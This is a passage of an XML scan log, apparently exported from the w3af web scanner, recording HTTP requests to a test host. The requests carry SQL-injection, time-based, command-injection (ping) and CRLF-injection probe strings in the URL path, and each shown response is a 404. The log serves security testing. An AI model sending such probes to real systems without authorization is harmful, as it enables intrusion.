code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="375">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="377">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hMHnzArS HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="378">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29%22+OR+%2229%22%3D%2229 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="379">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/dgcjv%3C%2F-%3Edgcjv%2F%2Adgcjv%22dgcjvdgcjv%27dgcjvdgcjv%60dgcjvdgcjv+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="396">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29%22+AND+%2229%22%3D%2230 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="410">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/__import__%28%27time%27%29.sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="572" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/__import__%28%27time%27%29.sleep%283%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="413">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29%27+OR+%2729%27%3D%2729 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="426">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3C%21-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="432">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/d%27z%220 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="436">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29%27+AND+%2729%27%3D%2730 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="451">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29+OR+29%3D29+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="455">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="464">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29+AND+29%3D30+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="491">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/Thread.sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="519">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="522">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="524">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="525">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/iDontExist HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="534">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="535">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af%0Dvulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="536">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af%0D%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
